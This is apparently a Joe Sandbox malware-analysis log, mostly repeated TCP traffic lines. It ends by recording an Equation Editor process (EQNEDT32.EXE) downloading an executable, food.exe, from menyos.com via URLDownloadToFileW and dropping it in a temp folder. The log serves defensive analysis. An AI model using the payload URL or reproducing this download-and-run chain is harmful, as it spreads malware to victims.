Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic HTTP traffic detected: GET /assets/home/js/bdg/food.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: menyos.comConnection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036706E2 URLDownloadToFileW, 2_2_036706E2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe
Source: global traffic HTTP traffic detected: GET /assets/home/js/bdg/food.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: menyos.comConnection: Keep-Alive
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: menyos.com
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
